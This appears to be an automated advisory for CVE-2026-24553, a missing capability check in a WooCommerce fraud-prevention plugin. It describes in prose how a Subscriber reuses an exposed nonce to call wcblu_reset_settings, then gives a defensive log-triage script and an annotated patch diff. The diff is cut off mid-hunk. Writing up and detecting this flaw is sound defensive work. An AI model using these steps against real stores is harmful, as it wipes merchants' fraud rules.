Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-24553: Fraud Prevention For Woocommerce <= 2.3.2 – Authenticated (Subscriber+) Information Exposure (woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers)

Severity: Medium (CVSS 4.3)
CWE: 200
Vulnerable Version: 2.3.2
Patched Version: 2.3.3
Disclosed: January 21, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24553:
The Fraud Prevention for WooCommerce and EDD plugin for WordPress, versions up to and including 2.3.2, contains an information exposure vulnerability. This flaw allows authenticated attackers with Subscriber-level access or higher to extract sensitive user and configuration data via an insufficiently protected AJAX endpoint.

Root Cause:
The vulnerability resides in the `wcblu_reset_settings()` function within `/admin/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-admin.php`. The function at line 607 only performed a nonce verification via `check_ajax_referer('wcblu-ajax-nonce', 'nonce')` but lacked a capability check. This allowed any authenticated user with a valid nonce to trigger the function. The nonce itself was exposed to low-privileged users via the `wp_localize_script()` call on line 121, which made the `adminajax` object containing the nonce available in the page source.

Exploitation:
An attacker with Subscriber-level access can first load any plugin admin page to obtain the exposed nonce from the `adminajax` JavaScript object. They then send a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `wcblu_reset_settings` and the `nonce` parameter set to the captured value. This request triggers the vulnerable function, which executes `update_option('wcblu_option', '')`, resetting the plugin's configuration and potentially exposing default or previously configured sensitive data in the response or subsequent plugin behavior.

Patch Analysis:
The patch adds a capability check to the `wcblu_reset_settings()` function. After the nonce verification, the patch inserts a `current_user_can('manage_woocommerce')` check. If the user lacks this capability, the function sends a JSON error with a 403 status code and terminates. This restricts the function's execution to users with WooCommerce management permissions. The patch also renames the localized script variable from `adminajax` to `wblp_order_ajax` on line 121, though this change alone does not mitigate the vulnerability without the capability check.

Impact:
Successful exploitation allows attackers to reset the plugin’s configuration, potentially disrupting fraud prevention rules and exposing sensitive operational data. Attackers can infer configuration details from the plugin’s behavior post-reset or from error messages. This data exposure can aid in further attacks against the WooCommerce store, such as bypassing fraud detection mechanisms or mapping the store’s security posture.
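A defender reviewing a store that ran 2.3.2 will want to know whether the reset endpoint was ever hit and whether the call went through. The following log-triage helper is an added example, not part of this advisory or of the plugin: it parses combined-format web server lines, picks out POSTs to `admin-ajax.php` whose `action` is `wcblu_reset_settings`, and labels each one by response status (the patched handler answers 403 to callers without `manage_woocommerce`; a 200 means the option was actually cleared). It assumes the `action` parameter appears in the query string; when a client sends it only in the POST body, access logs will not show it and a server-side hook or WAF log is needed instead. The log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx combined log format; not real traffic.
# Line 2 models a reset call from a session that had just loaded a plugin admin
# page (where the nonce is emitted); line 3 is ordinary Heartbeat traffic that
# must not fire; line 4 is a call that the patched handler refused with 403.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Jan/2026:10:14:58 +0000] "GET /wp-admin/admin.php?page=wcblu-auto-rules HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.5 - - [21/Jan/2026:10:15:02 +0000] "POST /wp-admin/admin-ajax.php?action=wcblu_reset_settings HTTP/1.1" 200 - "https://shop.example/wp-admin/admin.php?page=wcblu-auto-rules" "Mozilla/5.0"
198.51.100.7 - - [21/Jan/2026:10:20:11 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 51 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Jan/2026:11:02:40 +0000] "POST /wp-admin/admin-ajax.php?action=wcblu_reset_settings HTTP/1.1" 403 63 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# AJAX actions whose unauthorised use this advisory describes.
WATCHED_ACTIONS = {"wcblu_reset_settings"}


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs yields lists; keep the first value of each parameter.
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec


def classify(rec):
    """Label a parsed request 'reset-succeeded', 'reset-denied', or None if unrelated."""
    if rec["method"] != "POST" or not rec["path"].endswith("/wp-admin/admin-ajax.php"):
        return None
    if rec["query"].get("action") not in WATCHED_ACTIONS:
        return None
    # Patched handler: 403 from wp_send_json_error() for non-managers.
    # Vulnerable handler (or a legitimate manager): 200 after update_option('wcblu_option', '').
    return "reset-succeeded" if rec["status"] == "200" else "reset-denied"


def flag_reset_attempts(log_text):
    """Return (ip, timestamp, label, referer) for every watched request in the log."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label:
            hits.append((rec["ip"], rec["ts"], label, rec["referer"]))
    return hits


if __name__ == "__main__":
    for hit in flag_reset_attempts(SAMPLE_LOG):
        print(*hit)
```

A `reset-succeeded` hit from an account that is not a store manager means `wcblu_option` was wiped and the fraud rules need to be re-entered and reviewed; the referer shows which admin page the nonce was lifted from.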

Differential between vulnerable and patched code

Code Diff
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-admin.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-admin.php
@@ -118,7 +118,7 @@
                 $this->version,
                 false
             );
-            wp_localize_script( 'jquery-wblp-order-widget-js', 'adminajax', array(
+            wp_localize_script( 'jquery-wblp-order-widget-js', 'wblp_order_ajax', array(
                 'ajaxurl' => admin_url( 'admin-ajax.php' ),
                 'nonce'   => wp_create_nonce( 'wcblu-ajax-nonce' ),
             ) );
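Review bot: renaming the localized object from `adminajax` to `wblp_order_ajax` changes nothing about what is exposed: `'nonce' => wp_create_nonce( 'wcblu-ajax-nonce' )` is still written into the page for any user who can load it, and a nonce proves only that the request originated from that page, not that the user is authorised. If the order widget is only meaningful to store managers, gate the enqueue/localize call on `current_user_can( 'manage_woocommerce' )` too, and treat the server-side capability check as the real control.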
@@ -607,6 +607,11 @@
      */
     public function wcblu_reset_settings() {
         check_ajax_referer( 'wcblu-ajax-nonce', 'nonce' );
+        if ( !current_user_can( 'manage_woocommerce' ) ) {
+            wp_send_json_error( array(
+                'message' => esc_html__( 'You are not allowed to reset settings.', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' ),
+            ), 403 );
+        }
         update_option( 'wcblu_option', '' );
         die;
     }
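Review bot: this guard is the actual fix: `check_ajax_referer` only proves the caller held a nonce that the plugin hands to every logged-in user, so `current_user_can( 'manage_woocommerce' )` is what stops a Subscriber from clearing `wcblu_option`. `wp_send_json_error` ends execution through `wp_die`, so no explicit return is needed after it. The success path, however, still ends in a bare `die;` with no output; `wp_send_json_success()` would give the caller a definite result, and logging which user performed the reset would leave the audit trail that the vulnerable version lacked.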
@@ -722,6 +727,8 @@
             $wcbfc_proxy_order_weight = filter_input( INPUT_POST, 'wcbfc_proxy_order_weight', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcbfc_international_order = filter_input( INPUT_POST, 'wcbfc_international_order', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcbfc_international_order_weight = filter_input( INPUT_POST, 'wcbfc_international_order_weight', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
+            $wcbfc_unknown_origin = filter_input( INPUT_POST, 'wcbfc_unknown_origin', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
+            $wcbfc_unknown_origin_weight = filter_input( INPUT_POST, 'wcbfc_unknown_origin_weight', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcbfc_suspecius_email = filter_input( INPUT_POST, 'wcbfc_suspecius_email', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcbfc_suspecius_email_list = filter_input(
                 INPUT_POST,
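Review bot: `wcbfc_unknown_origin_weight` is numeric (the rule form submits 0 to 100) but is read with `FILTER_SANITIZE_FULL_SPECIAL_CHARS`, which accepts any string; `FILTER_VALIDATE_INT` with `'options' => array( 'min_range' => 0, 'max_range' => 100 )` would reject out-of-range or non-numeric weights server-side rather than relying on the `min`/`max` attributes of the form field. The same applies to the other `_weight` fields read in this block.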
@@ -730,6 +737,8 @@
                 FILTER_REQUIRE_ARRAY
             );
             $wcbfc_suspecious_email_weight = filter_input( INPUT_POST, 'wcbfc_suspecious_email_weight', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
+            $wcbfc_blocked_user_email_check = filter_input( INPUT_POST, 'wcbfc_blocked_user_email_check', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
+            $wcbfc_blocked_user_email_weight = filter_input( INPUT_POST, 'wcbfc_blocked_user_email_weight', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcbfc_unsafe_countries = filter_input( INPUT_POST, 'wcbfc_unsafe_countries', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcblu_define_unsafe_countries_list = filter_input(
                 INPUT_POST,
@@ -776,9 +785,13 @@
             $wcbfc_proxy_order_weight = ( empty( $wcbfc_proxy_order_weight ) ? '0' : $wcbfc_proxy_order_weight );
             $wcbfc_international_order = ( empty( $wcbfc_international_order ) ? '0' : $wcbfc_international_order );
             $wcbfc_international_order_weight = ( empty( $wcbfc_international_order_weight ) ? '0' : $wcbfc_international_order_weight );
+            $wcbfc_unknown_origin = ( empty( $wcbfc_unknown_origin ) ? '0' : $wcbfc_unknown_origin );
+            $wcbfc_unknown_origin_weight = ( empty( $wcbfc_unknown_origin_weight ) ? '0' : $wcbfc_unknown_origin_weight );
             $wcbfc_suspecius_email = ( empty( $wcbfc_suspecius_email ) ? '0' : $wcbfc_suspecius_email );
             $wcbfc_suspecius_email_list = ( empty( $wcbfc_suspecius_email_list ) ? array() : $wcbfc_suspecius_email_list );
             $wcbfc_suspecious_email_weight = ( empty( $wcbfc_suspecious_email_weight ) ? '0' : $wcbfc_suspecious_email_weight );
+            $wcbfc_blocked_user_email_check = ( empty( $wcbfc_blocked_user_email_check ) ? '0' : $wcbfc_blocked_user_email_check );
+            $wcbfc_blocked_user_email_weight = ( empty( $wcbfc_blocked_user_email_weight ) ? '0' : $wcbfc_blocked_user_email_weight );
             $wcbfc_unsafe_countries = ( empty( $wcbfc_unsafe_countries ) ? '0' : $wcbfc_unsafe_countries );
             $wcbfc_unsafe_countries_ip = ( empty( $wcbfc_unsafe_countries_ip ) ? '0' : $wcbfc_unsafe_countries_ip );
             $wcblu_define_unsafe_countries_list = ( empty( $wcblu_define_unsafe_countries_list ) ? array() : $wcblu_define_unsafe_countries_list );
@@ -820,9 +833,13 @@
             $wcbluruleoption_array['wcbfc_proxy_order_weight'] = $wcbfc_proxy_order_weight;
             $wcbluruleoption_array['wcbfc_international_order'] = $wcbfc_international_order;
             $wcbluruleoption_array['wcbfc_international_order_weight'] = $wcbfc_international_order_weight;
+            $wcbluruleoption_array['wcbfc_unknown_origin'] = $wcbfc_unknown_origin;
+            $wcbluruleoption_array['wcbfc_unknown_origin_weight'] = $wcbfc_unknown_origin_weight;
             $wcbluruleoption_array['wcbfc_suspecius_email'] = $wcbfc_suspecius_email;
             $wcbluruleoption_array['wcbfc_suspecius_email_list'] = $wcbfc_suspecius_email_list;
             $wcbluruleoption_array['wcbfc_suspecious_email_weight'] = $wcbfc_suspecious_email_weight;
+            $wcbluruleoption_array['wcbfc_blocked_user_email_check'] = $wcbfc_blocked_user_email_check;
+            $wcbluruleoption_array['wcbfc_blocked_user_email_weight'] = $wcbfc_blocked_user_email_weight;
             $wcbluruleoption_array['wcbfc_unsafe_countries'] = $wcbfc_unsafe_countries;
             $wcbluruleoption_array['wcbfc_unsafe_countries_ip'] = $wcbfc_unsafe_countries_ip;
             $wcbluruleoption_array['wcblu_define_unsafe_countries_list'] = $wcblu_define_unsafe_countries_list;
@@ -1170,13 +1187,25 @@
         echo esc_html( $label );
         ?></span>
 		<div class="mb-score-label-list">
-			<ul style="color:<?php
+			<button type="button" class="button wcblu-fc-details-toggle" data-show-text="<?php
+        esc_attr_e( 'Show more', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+        ?>" data-hide-text="<?php
+        esc_attr_e( 'Hide details', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+        ?>">
+				<span class="wcblu-toggle-text"><?php
+        esc_html_e( 'Show more', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+        ?></span>
+				<span class="dashicons dashicons-arrow-down-alt2 wcblu-toggle-icon" aria-hidden="true"></span>
+			</button>
+			<div class="wcblu-fc-details-content" style="display: none;">
+				<ul style="color:<?php
         echo esc_attr( $risk_label_color );
         ?>">
-				<?php
+					<?php
         echo wp_kses( $score_lables, $allow_html_args );
         ?>
-			</ul>
+				</ul>
+			</div>
 		</div>

 		<script type="text/javascript">
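Review bot: the new toggle `<button>` carries no `aria-expanded` attribute, so assistive technology cannot tell whether the hidden `.wcblu-fc-details-content` is open; set `aria-expanded="false"` here and flip it in the click handler. Output escaping in the hunk is correct (`esc_attr_e`, `esc_attr`, and `wp_kses` with `$allow_html_args` for `$score_lables`).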
@@ -1189,11 +1218,22 @@
 					jQuery('.wcblu_chart').val(Math.ceil(this.value)).trigger('change');
 				}
 			});
-			jQuery('.mb-score-label-list').click( function(){
-				jQuery(this).find('ul').fadeToggle();
-			});
-			jQuery(".mb-score-label-list ul").click(function(e) {
-				e.stopPropagation();
+			jQuery('.wcblu-fc-details-toggle').off('click').on('click', function(e) {
+				e.preventDefault();
+				var $button = jQuery(this);
+				var $content = $button.closest('.mb-score-label-list').find('.wcblu-fc-details-content');
+				var $text = $button.find('.wcblu-toggle-text');
+				var $icon = $button.find('.wcblu-toggle-icon');
+				$content.slideToggle(200);
+				setTimeout(function() {
+					if ($content.is(':visible')) {
+						$text.text($button.data('hide-text') || 'Hide details');
+						$icon.removeClass('dashicons-arrow-down-alt2').addClass('dashicons-arrow-up-alt2');
+					} else {
+						$text.text($button.data('show-text') || 'Show more');
+						$icon.removeClass('dashicons-arrow-up-alt2').addClass('dashicons-arrow-down-alt2');
+					}
+				}, 250);
 			});
 		</script>
 		<?php
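Review bot: the label and icon swap runs in a `setTimeout` of 250 ms that polls `$content.is(':visible')` after a 200 ms `slideToggle`; a second click inside that window, or a slower jQuery animation setting, leaves text and state out of sync. Use the animation's completion callback instead: `$content.slideToggle(200, function() { ... })`. Also, `.off('click')` removes every click handler on the button, not just this one; namespacing the event (`click.wcblu`) avoids clobbering handlers added elsewhere.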
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/dots-dashboard.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/dots-dashboard.php
@@ -202,6 +202,52 @@
                     </div>
                     </div>
                 </div>
+                <div class="wcblu-top-ten wcblu-main-chart wcblu-recent-orders" style="grid-column: span 6 / auto;">
+                    <div class="content">
+                        <div class="wcblu-table-title">
+                            <span class="wcblu-title"><?php
+    esc_html_e( 'Recent Orders 🔒', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                        </div>
+                        <div class="wcblu-table">
+                            <div class="wcblu-table-header">
+                                <div><?php
+    esc_html_e( 'Risk', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Name', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Spent', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Status', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                            </div>
+                            <div class="wcblu-table-row">
+                                <div class="wcblu-table-no-item"><?php
+    esc_html_e( 'Upgrade to unlock recent orders.', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                            </div>
+                        </div>
+                    </div>
+                </div>
+                <div class="wcblu-top-ten wcblu-main-chart wcblu-orders-breakdown" style="grid-column: span 6 / auto;">
+                    <div class="content">
+                        <div class="wcblu-table-title">
+                            <span class="wcblu-title"><?php
+    esc_html_e( 'Orders Breakdown 🔒', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                        </div>
+                        <div class="wcblu-recent-order-data-chart-main">
+                            <img src="<?php
+    echo esc_url( WB_PLUGIN_URL . 'admin/images/premium-upgrade-img/premium-fraud-data-graph.png' );
+    ?>" alt="<?php
+    esc_attr_e( 'Orders Breakdown Graph', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?>">
+                        </div>
+                    </div>
+                </div>
             </div>
         </div>
         <!-- Dashboard HTML start -->
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/dots-edd-dashboard.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/dots-edd-dashboard.php
@@ -168,6 +168,52 @@
                     </div>
                     </div>
                 </div>
+                <div class="wcblu-top-ten wcblu-main-chart wcblu-recent-orders" style="grid-column: span 6 / auto;">
+                    <div class="content">
+                        <div class="wcblu-table-title">
+                            <span class="wcblu-title"><?php
+    esc_html_e( 'Recent Orders 🔒', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                        </div>
+                        <div class="wcblu-table">
+                            <div class="wcblu-table-header">
+                                <div><?php
+    esc_html_e( 'Risk', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Name', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Spent', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Status', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                            </div>
+                            <div class="wcblu-table-row">
+                                <div class="wcblu-table-no-item"><?php
+    esc_html_e( 'Upgrade to unlock recent orders.', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                            </div>
+                        </div>
+                    </div>
+                </div>
+                <div class="wcblu-top-ten wcblu-main-chart wcblu-orders-breakdown" style="grid-column: span 6 / auto;">
+                    <div class="content">
+                        <div class="wcblu-table-title">
+                            <span class="wcblu-title"><?php
+    esc_html_e( 'Orders Breakdown 🔒', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                        </div>
+                        <div class="wcblu-recent-order-data-chart-main">
+                            <img src="<?php
+    echo esc_url( WB_PLUGIN_URL . 'admin/images/premium-upgrade-img/premium-fraud-data-graph.png' );
+    ?>" alt="<?php
+    esc_attr_e( 'Orders Breakdown Graph', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?>">
+                        </div>
+                    </div>
+                </div>
             </div>
         </div>
         <!-- Dashboard HTML start -->
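Review bot: this 46-line "Recent Orders / Orders Breakdown" upsell block is identical to the one added to dots-dashboard.php above; move it into a shared partial included from both dashboards so the two copies cannot drift.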
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/header/plugin-header.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/header/plugin-header.php
@@ -106,7 +106,7 @@
 $gs_list = ( isset( $wcblu_page ) && 'wcblu-general-settings' === $wcblu_page ? 'active' : '' );
 $rules = ( isset( $wcblu_page ) && 'wcblu-auto-rules' === $wcblu_page ? 'active' : '' );
 $ai_detection = ( isset( $wcblu_page ) && 'wcblu-ai-detection-setting' === $wcblu_page ? 'active' : '' );
-$wcblu_import_export_setting = ( isset( $current_tab ) && 'wcblu-import-export-setting' === $current_tab ? 'active' : '' );
+$wcblu_import_export_setting = ( isset( $wcblu_page ) && 'wcblu-import-export-setting' === $wcblu_page ? 'active' : '' );
 $wcblu_settings_menu = ( isset( $wcblu_page ) && ('wcblu-import-export-setting' === $wcblu_page || 'wcblu-import-export-setting' === $current_tab) ? 'active' : '' );
 $wcblu_free_dashboard = ( isset( $wcblu_page ) && 'wcblu-upgrade-dashboard' === $wcblu_page ? 'active' : '' );
 $wcblu_dashboard = ( isset( $wcblu_page ) && 'wcblu-dashboard' === $wcblu_page ? 'active' : '' );
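Review bot: this line now keys off `$wcblu_page`, but the unchanged line below it, `$wcblu_settings_menu = ( isset( $wcblu_page ) && ('wcblu-import-export-setting' === $wcblu_page || 'wcblu-import-export-setting' === $current_tab) ? 'active' : '' );`, still reads `$current_tab` without an `isset` guard; if `$current_tab` is no longer set on this page, PHP emits an undefined-variable warning. Either guard it or drop the `$current_tab` clause now that the page slug is the source of truth.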
@@ -191,23 +191,24 @@
                                 </li>

                                 <?php
-$wcblu_settings_page_url = '';
 $wcblu_settings_page_url = add_query_arg( array(
-    'page' => 'wblp-get-started&tab=wblp-get-started',
+    'page' => 'wcblu-import-export-setting',
 ), admin_url( 'admin.php' ) );
+?>
+                                <li>
+                                    <a class="dotstore_plugin <?php
+echo esc_attr( $wcblu_settings_menu );
+?>" href="<?php
+echo esc_url( $wcblu_settings_page_url );
+?>"><?php
+esc_html_e( 'Settings', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+?></a>
+                                </li>
+                                <?php
 if ( wbpfoabfc_fs()->is__premium_only() && wbpfoabfc_fs()->can_use_premium_code() ) {
     ?>
                                     <li>
                                         <a class="dotstore_plugin <?php
-    echo esc_attr( $wcblu_settings_menu );
-    ?>" href="<?php
-    echo esc_url( $wcblu_settings_page_url );
-    ?>"><?php
-    esc_html_e( 'Settings', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
-    ?></a>
-                                    </li>
-                                    <li>
-                                        <a class="dotstore_plugin <?php
     echo esc_attr( $wcblu_account_page );
     ?>" href="<?php
     echo esc_url( wbpfoabfc_fs()->get_account_url() );
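Review bot: moving the Settings `<li>` out of the `is__premium_only() && can_use_premium_code()` block makes the link visible to every user who sees this header, and its target changes from the `wblp-get-started` page to `wcblu-import-export-setting`. That is acceptable only if the import/export page checks capabilities both on load and in its form handlers, since menu visibility is not an access control and that page is not part of this diff; worth confirming. Dropping the redundant `$wcblu_settings_page_url = '';` initialisation is fine.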
@@ -260,8 +261,15 @@
 echo esc_attr( $wcblu_display_submenu );
 ?>">
                     <ul>
-                    <?php
-?>
+                        <li><a class="<?php
+echo esc_attr( $wcblu_import_export_setting );
+?>" href="<?php
+echo esc_url( add_query_arg( array(
+    'page' => 'wcblu-import-export-setting',
+), admin_url( 'admin.php' ) ) );
+?>"><?php
+esc_html_e( 'Import / Export', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+?></a></li>
                         <li><a href="<?php
 echo esc_url( 'https://www.thedotstore.com/plugins/' );
 ?>" target="_blank"><?php
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/wcblu-rule-settings.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/wcblu-rule-settings.php
@@ -694,6 +694,55 @@
                             </div>
                         </td>
                     </tr>
+                    <tr>
+                        <th scope="row" class="titledesc">
+                            <label><?php
+    echo esc_html__( 'Blocked user email match', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?>
+                                <div class="wcbfc-tooltip-rules">
+                                    <span class="wcbfc-tooltiptext wcbfc-tooltip-bottom"><?php
+    echo esc_html( 'Check if the checkout email matches a blocked user email.' );
+    ?></span>
+                                </div>
+                            </label>
+                        </th>
+                        <td>
+                            <div class="wcbfc-control-settings">
+                                <label class="switch" for="wcbfc_blocked_user_email_check">
+                                    <div class="slider round"></div>
+                                </label>
+                                <div class="wcblu_rule_field">
+                                    <input name="wcbfc_blocked_user_email_weight" id="wcbfc_blocked_user_email_weight" type="number" style="width: 5em;" value="0" class="wcbfc_rules_weights" placeholder="" min="0" step="1" max="100">
+                                    <label class="wcbfc-rule-weight-label"><?php
+    echo esc_html__( 'Rule Weight', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></label>
+                                </div>
+                            </div>
+                            <div class="wcbfc-control-points">
+                                <progress max="100" class="wcbfc-progressBar" value=""></progress>
+                                <span class="wcbfc-tooltip progress-tooltip">0</span>
+                                <div class="progress-container">
+                                    <div class="progress-bar">
+                                        <div class="segment good">
+                                            <span class="text"><?php
+    echo esc_html__( 'No Importance', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                                        </div>
+                                        <div class="segment average">
+                                            <span class="text"><?php
+    echo esc_html__( 'Moderate', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                                        </div>
+                                        <div class="segment poor">
+                                            <span class="text"><?php
+    echo esc_html__( 'High Importance', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                                        </div>
+                                    </div>
+                                </div>
+                            </div>
+                        </td>
+                    </tr>
                 </tbody>
             </table>
             <div class="heading_div">
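Review bot: `<label class="switch" for="wcbfc_blocked_user_email_check">` references an input id that appears nowhere in this hunk; unless the checkbox is rendered elsewhere, the switch has nothing to toggle and `filter_input( INPUT_POST, 'wcbfc_blocked_user_email_check', ... )` in the save handler will always be empty, so the rule can never be enabled. The weight input is also hard-coded to `value="0"` rather than populated from the saved `wcbfc_blocked_user_email_weight` option, so a saved weight will not be shown back to the admin.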
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/includes/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-activator.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/includes/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-activator.php
@@ -72,9 +72,13 @@
             $wcbluruleoption_array['wcbfc_proxy_order_weight']           = '50';
             $wcbluruleoption_array['wcbfc_international_order']          = '1';
             $wcbluruleoption_array['wcbfc_international_order_weight']   = '10';
+            $wcbluruleoption_array['wcbfc_unknown_origin']               = '0';
+            $wcbluruleoption_array['wcbfc_unknown_origin_weight']        = '0';
             $wcbluruleoption_array['wcbfc_suspecius_email']              = '1';
             $wcbluruleoption_array['wcbfc_suspecius_email_list']         = '';
             $wcbluruleoption_array['wcbfc_suspecious_email_weight']      = '5';
+            $wcbluruleoption_array['wcbfc_blocked_user_email_check']     = '0';
+            $wcbluruleoption_array['wcbfc_blocked_user_email_weight']    = '0';
             $wcbluruleoption_array['wcbfc_unsafe_countries']             = '1';
             $wcbluruleoption_array['wcblu_define_unsafe_countries_list'] = '';
             $wcbluruleoption_array['wcbfc_unsafe_countries_weight']      = '25';
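Review bot: these defaults run only in the activator, so sites upgrading in place from 2.3.2 will not have `wcbfc_unknown_origin`, `wcbfc_unknown_origin_weight`, `wcbfc_blocked_user_email_check` or `wcbfc_blocked_user_email_weight` in the stored rule option until the settings form is saved again. The `empty() ? '0'` fallbacks in the save handler cover the form path; any read path that scores orders should tolerate the missing keys, or an upgrade routine should add them.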
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/public/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-public.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/public/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-public.php
@@ -452,16 +452,16 @@
                 $meta = get_post_meta( $post_id, 'Attempt', true );
                 $meta++;
                 update_post_meta( $post_id, 'Attempt', $meta );
-                update_post_meta( $post_id, 'First Name', filter_input( INPUT_POST, 'billing_first_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Last Name', filter_input( INPUT_POST, 'billing_last_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'City', filter_input( INPUT_POST, 'billing_city', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Country', filter_input( INPUT_POST, 'billing_country', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Phone', filter_input( INPUT_POST, 'billing_phone', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Company', filter_input( INPUT_POST, 'billing_company', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Postcode', filter_input( INPUT_POST, 'billing_postcode', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Address 1', filter_input( INPUT_POST, 'billing_address_1', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Address 2', filter_input( INPUT_POST, 'billing_address_2', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'State', filter_input( INPUT_POST, 'billing_state', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
